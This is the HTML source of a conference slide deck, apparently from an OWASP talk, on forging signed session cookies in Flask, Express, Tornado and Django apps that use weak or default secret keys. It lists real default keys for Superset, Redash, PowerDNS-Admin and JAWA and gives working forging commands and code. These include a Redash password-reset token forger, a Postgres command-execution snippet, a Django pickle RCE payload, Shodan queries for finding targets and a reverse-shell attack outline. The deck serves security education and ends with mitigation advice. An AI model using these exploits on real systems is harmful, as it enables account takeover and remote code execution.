<!doctype html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

		<title>They are dangerous</title>

		<meta name="description" content="... so better to hack this">
		<meta name="author" content="d4d">

		<link rel="stylesheet" href="dist/reset.css">
		<link rel="stylesheet" href="dist/reveal.css">
		<link rel="stylesheet" href="dist/theme/black.css">

		<!-- Theme used for syntax highlighted code -->
		<link rel="stylesheet" href="plugin/highlight/monokai.css">
	</head>
	<body>
		<div class="reveal">
			<div class="slides">
				<section data-background-image="images/background.png" data-background-opacity="0.5">
					<h2>They are dangerous</h2>
					<h3>... so better to hack this</h3>
					<p>
						<small>By <a href="https://d0ge.github.io/">d4d</a></small>
						<br>
						<small>for <a href="https://owasp.org/www-chapter-czech-republic/">OWASP Czech Republic</a></small>
					</p>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
					<h2>table of contents</h2>
					<p>
						<ul>
							<li>Flask</li>
							<li>Express</li>
							<li>Tornado</li>
							<li>Django</li>
						</ul>
					</p>
				</section>
				<section>
				<img src="images/itsdangerous-logo.png" style="background-color:white;"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Airflow CVE-2020-17526</h2>
        <p>
        	<blockquote>Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.</blockquote>
        </p>
        </section>
        <section data-background-image="images/background.png" data-background-opacity="0.5">
	        <h1>Flask</h1>
	      </section>
	      <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Flask signed cookies</h2>
        <p>
        	Flask by default uses something called <u>signed cookies</u>, which is simply a way of storing the current session data on the client (rather than the server) in such a way that it cannot (in theory) be tampered with.
        </p>
        </section>
	      <section data-background-image="images/background.png" data-background-opacity="0.5">
	      <h2>Flask</h2>
				<div style="position:relative; width:720px; height:720px; margin:0 auto;">
				  <img class="fragment" src="images/intro-flask.png" style="position:absolute;top:0;left:0;" />
				  <img class="fragment" width="120" height="120" src="images/spacemarin-left.png" style="position:absolute;bottom:300px;left:0;" />
				</div>
				</section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Session data</h2>
        <p>
        	The session data is the actual content of the session, while at first glance it looks unreadable, but to those who recognise it, it’s actually just a Base64 encoded string. If we were to decode this with itsdangerous base64 decoder, we’d get the following output:
        	<div style="position: absolute; width: 100%; right: 0; box-shadow: 0 10px 40px rgba(0,0,0,0.5), 0 5px 25px rgba(0,0,0,0.2); background-color: rgba(0, 0, 0, 0.9); color: #fff; padding: 10px; text-align: center;">
						<p>
							<span style="display: inline-block;">
									<span>{ logged_in: False }</span><br>
							</span>
						</p>
					</div>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Timestamp</h2>
        <p>
        	The timestamp tells the server when the data was last updated. Depending on what version of Python library ItsDangerous you’re using, this might be the current Unix timestamp, or the current Unix timestamp minus the epoch
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Cryptographic Hash</h2>
        <p>
        	This is the part which makes the cookie <u>secure</u>. Before the server sends you your latest session data, it calculates a <b>sha1</b> hash based on the combination of your session data, current timestamp and the server’s secret key.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>temporary_key</h2>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Flask-Unsign</h2>
        <p>
        	Command line tool <a href="https://github.com/Paradoxis/Flask-Unsign">Flask-Unsign</a> to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. In addition to it comes a large dictionary of secret keys - <a href="https://github.com/Paradoxis/Flask-Unsign-Wordlist">Flask-Unsign-Wordlist</a>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Flask-Unsign</h2>
					<img src="images/flask-unsign.svg"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Airflow exploitation</h2>
        <img src="images/airflow-login-page.png"/>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Airflow exploitation</h2>
        <p>
        	We can very easily browse to an Airflow instance's login page, capture the unauthenticated cookie, and test to see if it is vulnerable:
        </p>
        <p>
        	<code>flask-unsign -u -c &lt;cookie&gt;</code>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Airflow exploitation</h2>
        <p>
        	It's then trivial to take that same cookie and forge the user_id attribute, which will designate what user ID you want to login as. Since we are using stateless cookies, the Airflow instance has no idea we are modifying this attribute. In this example we'll try an ID of 1, which is typically an admin:
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Airflow exploitation</h2>
					<img src="images/airflow-session.svg"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Recon</h2>
        <p>
        	Now. When you get familiar with Airflow vulnerability, we can move to the recon. Initial Luke Paris research <a href="https://blog.paradoxis.nl/defeating-flasks-session-management-65706ba9d3ce">Baking Flask cookies with your secrets</a> use the Shodan to find all Werkzeug servers that set cookie session with query:
        </p>
        <p>
        	<span style="font-style:italic;font-weight:lighter">
        	"Server: Werkzeug" and "Set-Cookie: session="
        </span>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Shodan</h2>
					<img src="images/shodan-search.png"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Censys</h2>
					<img src="images/censys-search.png"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Note</h2>
        <p>
        	<span style="font-style:italic;font-weight:lighter">Just because the servers are running Werkzeug, doesn’t mean they’re running Flask. Furthermore we’re not taking applications whose information is stripped by another web server like Nginx, those who don’t instantly set a cookie or which are running behind a firewall into account. So take the following data with a grain of salt.</span>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Recon</h2>
					<img src="images/flask-sessions-statistics.png"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Super secret key</h2>
        <p>
        	There is no patter for this secret key. Most common applications are <a href="https://github.com/cookiecutter-flask/cookiecutter-flask">Cookiecutter Flask</a> and <a href="https://github.com/app-generator/flask-dashboard-adminlte">AdminLTE Flask</a> template engine. Exploitation is pretty simple and can be done by <span style="font-style:italic;font-weight:lighter">`_id` and `_user_id`</span> bruteforce.
        </p>
        </section>

        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>PowerDNS-Admin</h2>
        <img src="images/powerdns-login.png"/>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>PowerDNS-Admin</h2>
        <p>
        	Default hardcoded configuration secret_key is <span style="font-style:italic;font-weight:lighter">e951e5a1f4b94151b360f47edf596dd2</span>. It's then trivial to take that same cookie and forge the `_user_id` attribute (not <b>`user_id`</b>), which will designate what user ID you want to login.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>PowerDNS-Admin</h2>
        	<div style="position: absolute; width: 100%; right: 0; box-shadow: 0 10px 40px rgba(0,0,0,0.5), 0 5px 25px rgba(0,0,0,0.2); background-color: rgba(0, 0, 0, 0.9); color: #fff; padding: 10px; text-align: left;">
						<p>
							<span style="color: #b8f;">d4d</span> in <span style="color: #4f5;">~</span> <span style="color: #e83;">λ</span>
							<span style="color: #4f5;">flask-unsign</span> <span style="color: #ea6;">-s --secret</span> <span style="color: #f00;">'e951e5a1f4b94151b360f47edf596dd2'</span> <span style="color: #ea6;">-c</span>  <span>"{'_fresh': True, '_id': '1', '_permanent': True, <span style="color: #f00;">'_user_id': '1'</span>, 'authentication_type': 'LOCAL', 'csrf_token': '1', 'user_logged': True }</span>
						</p>
					</div>
        </section>
        <!-- 
        	Superset
        -->
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Superset</h2>
        <img src="images/superset-login.png"/>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Superset</h2>
        <p>
        	Another very very common secret key is <span style="font-style:italic;font-weight:lighter">\2\1thisismyscretkey\1\2\\e\\y\\y\\h</span>. It is usually used by Apache Superset. Same as in case of PowerDNS and Airflow an attacker can login as an administrator by forging a session cookie with a user_id or _user_id value set to 1, using the off-the-shelf flask-unsign toolkit. “1” corresponds to the first Superset user, who is almost always an administrator.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Superset</h2>
        <p>
        	Superset is designed to enable integrations with a variety of databases for exploring data and creating visualizations. Admin access gives attackers a lot of control over these databases and the ability to add and remove database connections. By default database connections are set up with read-only permissions but an attacker with admin access can enable writes and DML (data model language) statements. 
        </p>
        </section>
       	<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Superset</h2>
        <img src="images/superset-enable-dml-drop-table.png.webp"/>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Superset</h2>
        <p>
        	The powerful SQL Lab interface allows attackers to run arbitrary SQL statements against connected databases. Depending on database user privileges, attackers can query, modify, and delete any data in the database as well as execute remote code on the database server:
        </p>
        <pre data-id="code-animation">
        	<code data-trim>
						DROP TABLE IF EXISTS cmd_exec;          
						CREATE TABLE cmd_exec(cmd_output text); 
						COPY cmd_exec FROM PROGRAM 'id';        
						SELECT * FROM cmd_exec;                 
						DROP TABLE IF EXISTS cmd_exec;          
      		</code>
        </pre>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Superset</h2>
        <p>
        	Default secret key was changed:
        </p>
        <pre data-id="code-animation">
        	<code data-trim>
    '\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', #ver < 1.4.1
    'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',         #ver >= 1.4.1
    'thisISaSECRET_1234',                           #template
    'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',         #documentation
    'TEST_NON_DEV_SECRET'                           #docker         
      		</code>
        </pre>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Patch</h2>
        <p>
        	The Superset team made an <a href="https://github.com/apache/superset/pull/23186">patch</a> with the 2.1 release to not allow the server to start up if it’s configured with a default SECRET_KEY. With this update, many new users of Superset will no longer unintentionally shoot themselves in the foot.
        </p>
        </section>

				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Secrets</h2>
        <table class="GeneratedTable">
				<thead>
				  <tr>
				    <th>Secret</th>
				    <th>Numbers</th>
				  </tr>
				</thead>
				<tbody>
				  <tr>
				    <td>you-will-never-guess</td>
				    <td>19</td>
				  </tr>
				  <tr>
				    <td>secret</td>
				    <td>17</td>
				  </tr>
				  <tr>
				    <td>&lt;some secret key&gt;</td>
				    <td>14</td>
				  </tr>
				</tbody>
				</table>
        </section>
				<!-- 
        	Redash
        -->
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Redash</h2>
        <img src="images/redash-login.png"/>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Redash</h2>
        <p>
        	Redash insecure default configuration: <span style="font-style:italic;font-weight:lighter">c292a0a3aa32397cdb050e233733900f</span>. If you configured Redash without explicitly specifying the `REDASH_COOKIE_SECRET` environment variable, Redash instead used a default value that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Redash</h2>
        <p>
        	If Redash secret is known to an attacker then they can modify the session state. In this case, we can modify the Redash `user_id` for the session and log in as any user. But there is another interesting exploit for the vulnerability. It is easiest to forge a password reset link for Redash.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
					<pre data-id="code-animation"><code data-trim data-line-numbers="|5,7-8">
					from itsdangerous import URLSafeTimedSerializer, 
																		SignatureExpired, BadSignature

					logger = logging.getLogger(__name__)
					serializer = URLSafeTimedSerializer(settings.SECRET_KEY)

					def invite_token(user):
					    return serializer.dumps(str(user.id))			
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Redash</h2>
        <img src="images/itsdangerous-serializer.png"/>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Redash</h2>
        	<p>
        		Visit password reset link <span style="font-style:italic;font-weight:lighter">{host}/redash/reset/&lt;token&gt;</span> and choose a new password for user ID 1. 
        	</p>
					<pre data-id="code-animation"><code data-trim>
					from itsdangerous import URLSafeTimedSerializer, 
																		SignatureExpired, BadSignature
					s=URLSafeTimedSerializer("c292a0a3aa32397cdb050e233733900f")
					s.dumps(str("1"))		
					</code></pre>
				</section>
				<!-- 
        	Okta sample
        -->
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Okta sample application</h2>
        <img src="images/okta-login.png"/>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Okta sample application</h2>
        <p>
        	<a href="https://github.com/okta/samples-python-flask">This example</a> shows you how to use Flask to login to your application with a Custom Login page. First version of application uses easily predictable secret key to sign session cookie: <span style="font-style:italic;font-weight:lighter">SomethingNotEntirelySecret</span>.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Okta sample application</h2>
        <p>
        	Unfortunately for attacker it is not enough to completely bypass authorisation mechanism as OpenIDConnect library have own session handling logic. Luckily for us it relies on same `SECRET_KEY` as it shown at on source code of  <a href="https://github.com/puiterwijk/flask-oidc">flask-oidc</a>.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Okta sample application</h2>
        	<p>
        		Session cookies is JWT token, signed by cryptographic hash calculated using same secret key.
        	</p>
					<pre data-id="code-animation"><code data-trim>
					self.extra_data_serializer = JSONWebSignatureSerializer(
					    app.config['SECRET_KEY'], salt='flask-oidc-extra-data')
					self.cookie_serializer = JSONWebSignatureSerializer(
					    app.config['SECRET_KEY'])	
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>JSON Web Token (JWT)</h2>
        	<p>
        		OIDC claims:
        	</p>
					<pre data-id="code-animation"><code data-trim>
					{ "sub": "0123456789abcdef",
						"name": "Test Name",
						"email": "attacker@example.com",
						"ver": 1,
						"iss": "https://example.com",
						"aud": "0123456789abcdef",
						"iat": 1000000000,
						"exp": 2000000001,
						"jti": "ID.0123456789abcdef-0123456789abcdef",
						"amr": [ "pwd" ],
						"preferred_username": "attacker@example.com",
						"auth_time": 2000000001,
						"at_hash": "0123456789abcdef" }
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>JAWA</h2>
        <img src="images/JAWA-cron-job.png"/>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>JAWA</h2>
        <p>
        	<a href="https://github.com/jamf/JAWA">Jamf Automation and Webhook Assistant</a> is a web server for hosting automation tools that interact with Jamf Pro, such as a webhook reciever, cron/timed exectution of scripts, and automated report generation. It is a flask app. If development team left SECRET_KEY by default it will allow any malicious user to get root access to vulenerable application. 
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>JAWA</h2>
        	<p>
        		Default secret key before <a href="https://github.com/jamf/JAWA/commit/6b722a4734c29a97f0a30c277a2c39f19bcba282">commit</a>:
        	</p>
					<pre data-id="code-animation"><code data-trim>
					if __name__ == '__main__':
						app.secret_key = "untini"
						serve(app, url_scheme='https',host='0.0.0.0', port=8000)
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Step to reproduce</h2>
        <ul>
					<li>Create admin session token with flask-unsign</li>
					<li>Upload cron job reverse shell</li>
					<li>Wait for ping back</li>
					<li>You are the root now</li>
				</ul>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <video data-autoplay src="images/jawa-cron-rce.mov"></video>
        </section>
        <section data-background-image="images/background.png" data-background-opacity="0.5">
	        <h1>Express</h1>
	      </section>
	      <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Express cookie-session</h2>
        <p>
        	As Flask, Express <u>cookie-session</u> uses stateless, signed cookies to store authentication data. This means that <u>cookie-session</u>  is reliant on the <u>passport</u> attribute in the session cookie to determine if you are logged in. Session cookie is signed with sha1 algorithm.
        </p>
        </section>
	      <section data-background-image="images/background.png" data-background-opacity="0.5">
	      <h2>Express</h2>
				<div style="position:relative; width:720px; height:720px; margin:0 auto;">
				  <img class="fragment" src="images/express-intro.png" style="position:absolute;top:0;left:0;" />
				  <img class="fragment" width="120" height="120" src="images/spacemarin-right.png" style="position:absolute;bottom:300px;right:0;" />
				</div>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Exploit</h2>
        	<p>
        		cookie_sig = sign('session=&lt;passport&gt;', secret_key)
        	</p>
					<pre><code data-trim>
						def sign(data, key):
							key = key.encode()
							data = data.encode()
							hashData = hmac.new(key, data, sha1)
							signData = base64.encodebytes(hashData.digest())
																							.decode('utf-8')
							return signData.replace('/', '_').replace('+', '-')
															.replace('=', '').replace('\n','')
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Recon</h2>
        <p>
        	When you get familiar with Express <u>cookie-session</u> vulnerability, we can move to the recon. Again we can use the Shodan to find all express servers that set cookie session with query:
        </p>
        <p>
        	<span style="font-style:italic;font-weight:lighter">
        	"Set-Cookie: session.sig="
        </span>
        </p>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Note</h2>
        <p>
        	<span style="font-style:italic;font-weight:lighter">Just because the server return session.sig cookie they’re running express application. Furthermore we’re not taking applications whose cookies were renamed to something else. So take the following data with a grain of salt.</span>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Recon</h2>
					<img src="images/express-sessions-statistics.png"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Parse Server</h2>
        <p>
        	Parse is a widely used open-source framework for the development of application backends. The framework aids developers in speeding up application development to a considerable extent. It also cuts down on the effort necessary for developing an application. Parse can be used to develop conventional software projects such as web, mobile, and IoT (Internet of Things) applications.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Parse Server</h2>
        <img src="images/parse-dashboard.png"/>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>MSAL for Node</h2>
        <img src="images/msal-secrets-warning.png"/>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>MSAL for Node</h2>
        <p>
        	<a href="https://learn.microsoft.com/en-us/azure/active-directory/develop/tutorial-v2-nodejs-webapp-msal">MSAL authentication library tutorial</a> does not have the vulnerability. My goal is to demonstrate some features that can be used to bypass authorization checks at <u>cookie-session</u>.
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>MSAL for Node</h2>
        	<p>
        		OAuth2.0 Authorization Code flow
        	</p>
					<pre data-id="code-animation"><code data-trim data-line-numbers="|3-6|6">
					try {
						const tokenResponse = await msalInstance.acquireTokenByCode(req.session.authCodeRequest);
						req.session.accessToken = tokenResponse.accessToken;
						req.session.idToken = tokenResponse.idToken;
						req.session.account = tokenResponse.account;
						req.session.isAuthenticated = true;
						res.redirect(state.redirectTo);
					} catch (error) {
						next(error);
					}
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>MSAL for Node</h2>
        	<p>
        		We can create a new session with `isAuthenticated` flag and account information:
        	</p>
					<pre data-id="code-animation"><code data-trim>
						{ "isAuthenticated":True, 
							"account":{
							    "username": name,
							    "name": name,
							    "idTokenClaims":{
							        "emails":[email],
							        "name":name
							    },
							    "localAccountId":"1",
							    "homeAccountId":"1",
							    "nativeAccountId":"1",
							    "environment":"login.microsoftonline.com",
							    "tenantId":"01234567890"
								}
							}
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
				<h2>MSAL for Node</h2>
					<p>
						Custom middleware to check auth state:
					</p>
					<pre data-id="code-animation"><code data-trim>
					function isAuthenticated(req, res, next) {
					    if (!req.session.isAuthenticated) {
					    	// redirect to sign-in route
					      return res.redirect('/auth/signin'); 
					    }
					    next();
					};
					</code></pre>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
				<h2>MSAL for Node</h2>
					<p>
						ID rout:
					</p>
					<pre data-id="code-animation"><code data-trim>
					router.get('/id',
						isAuthenticated,
						async function (req, res, next) {
							res.render('id', { idTokenClaims: 
							req.session.account.idTokenClaims });
						}
					);
					</code></pre>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
				<h2>MSAL for Node</h2>
					<p>
						Profile rout:
					</p>
					<pre data-id="code-animation"><code data-trim>
					router.get('/profile',
					    isAuthenticated,
					    async function (req, res, next) {
					        try {
					            const graphResponse = await fetch(GRAPH_ME_END, 
					                req.session.accessToken);
					            res.render('profile', { profile: graphResponse });
					        } catch (error) {
					            next(error);
					        }
					    }
					);
					</code></pre>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>MSAL for Node</h2>
        <img src="images/msal-auth-bypass.png"/>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Claim attributes</h2>
					<p>
						The session limit is big that allows to inject a number of potential flags for each rout. Sample flags are:
					</p>
					<div style="position: absolute; width: 50%; right: 200px; box-shadow: 0 10px 40px rgba(0,0,0,0.5), 0 5px 25px rgba(0,0,0,0.2); background-color: rgba(0, 0, 0, 0.9); color: #fff; padding: 10px; text-align: left;">
						<p><small>
							isAuth<br/>
							isAuthAdmin<br/>
							isAuthenticated<br/>
							isAdmin<br/>
							isAdminLogged<br/>
							isAdminLoggedIn<br/>
							isLogin<br/>
							isLogged<br/>
							isLoggedIn<br/>
							isUserLoggedIn<br/>
							is_logined<br/>
							loggedIn
						</small></p>
					</div>
        </section>
        <section data-background-image="images/background.png" data-background-opacity="0.5">
	        <h1>Tornado</h1>
	      </section>
	      <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Tornado</h2>
        <p>
        	As Flask, Tornado web framework signs and timestamps a cookie so it cannot be forged. Normally, we cannot modify these attributes because the cookie is signed, which means we will break the seal by modifying the contents — unless we have the key!
        </p>
        </section>
	      <section data-background-image="images/background.png" data-background-opacity="0.5">
	      <h2>Tornado</h2>
				<div style="position:relative; width:720px; height:720px; margin:0 auto;">
				  <img class="fragment" src="images/tornado-intro.png" style="position:absolute;top:0;left:0;" />
				  <img class="fragment" width="120" height="120" src="images/spacemarin-right.png" style="position:absolute;bottom:300px;right:0;" />
				</div>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Signature</h2>
        	<p>
        		The signature is an HMAC-SHA256 of the whole string up to that point, including the final pipe.
        	</p>
					<pre><code data-trim>
					def _create_signature_v2(secret: Union[str, bytes], s: bytes) -> bytes:
						hash = hmac.new(utf8(secret), digestmod=hashlib.sha256)
						hash.update(utf8(s))
						return utf8(hash.hexdigest())
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Recon</h2>
        <p>
        	 When you get familiar with Tornado cookie signing algorythm, we can move to the recon. Again we can use the Shodan to find all express servers that set cookie session with query:
        </p>
        <p>
        	<span style="font-style:italic;font-weight:lighter">
        	Server: TornadoServer "2|1:0|"
        </span>
        </p>
        </section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Note</h2>
        <p>
        	<span style="font-style:italic;font-weight:lighter">Just because the servers are running TornadoServer, doesn’t mean they’re using set_signed_cookie. Furthermore we’re not taking applications whose information is stripped by another web server like Nginx, those who don’t instantly set a cookie or which are running behind a firewall into account. So take the following data with a grain of salt.</span>
        </p>
        </section>
        <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Recon</h2>
					<img src="images/tornado-sessions-statistics.png"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Recon</h2>
        <p>
        	After weeding out the non-signed cookies, I was left with 561 valid sessions. Passing each of these to script, resulted in 76 cracked sessions which is around 13%. Of these 76 sessions, only 10 unique secret keys were used. There is no patter for these secret keys. Most common applications are examples.
        </p>
        </section>
        <section data-background-image="images/background.png" data-background-opacity="0.5">
	        <h1>Django</h1>
	      </section>
	      <section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        <h2>Django</h2>
        <p>
        	To use cookies-based sessions, set the SESSION_ENGINE setting to "django.contrib.sessions.backends.signed_cookies". The session data will be stored using Django’s tools for cryptographic signing and the SECRET_KEY setting. Algorithm must be an algorithm supported by hashlib, it defaults to 'sha256'.
        </p>
        </section>
	      <section data-background-image="images/background.png" data-background-opacity="0.5">
	      <h2>Django</h2>
				<div style="position:relative; width:720px; height:720px; margin:0 auto;">
				  <img class="fragment" src="images/sentry-intro.png" style="position:absolute;top:0;left:0;" />
				  <img class="fragment" width="120" height="120" src="images/spacemarin-right.png" style="position:absolute;bottom:300px;right:0;" />
				</div>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Warning</h2>
					<img src="images/django-warning.png"/>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>RCE</h2>
        	<p>
        		Remote code execution was known for a while. In 2018 year Sentry debug mode was used to exploit session cookies <a href="https://blog.scrt.ch/2018/08/24/remote-code-execution-on-a-facebook-server/">RCE on Sentry</a>. Pickle - django.contrib.sessions.serializers.PickleSerializer is a binary protocol for (un)serializing Python object structures, such as classes and methods in them. If we were able to forge our own session that contains arbitrary pickle content, we could execute commands on the system.
        	</p>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
					<h2>Exploit</h2>
					<pre><code data-trim>
					SECRET_KEY='!!changeme!!'
					cookie='cookie'
					newContent =  django.core.signing.loads(
						cookie,
						key=SECRET_KEY,
						serializer=django.contrib.sessions.serializers.PickleSerializer,
						salt='django.contrib.sessions.backends.signed_cookies')
					class PickleRce(object):
					    def __reduce__(self):
					        return (os.system,("sleep 30",))
					newContent['testcookie'] = PickleRce()

					print django.core.signing.dumps(
						newContent,
						key=SECRET_KEY)
					</code></pre>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h2>Recommendation</h2>
        	<p>
        		There are multiple ways you could avoid this issue. The first and most obvious way of doing so is to simply never use default secrets! Make your secret key random. The most practical solution is to not allow the server to start up if it’s configured with a default SECRET_KEY.
        	</p>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
        	<h1>Q&A</h1>
				</section>
				<section data-background-gradient="linear-gradient(to bottom, #200640, #141143)">
						<a href="https://btlfry.gitlab.io/notes/">My notes</a> <br>
				</section>

		<script src="dist/reveal.js"></script>
		<script src="plugin/notes/notes.js"></script>
		<script src="plugin/markdown/markdown.js"></script>
		<script src="plugin/highlight/highlight.js"></script>
		<script>
			// More info about initialization & config:
			// - https://revealjs.com/initialization/
			// - https://revealjs.com/config/
			Reveal.initialize({
				hash: true,

				// Learn about plugins: https://revealjs.com/plugins/
				plugins: [ RevealMarkdown, RevealHighlight, RevealNotes ]
			});
		</script>
	</body>
</html>
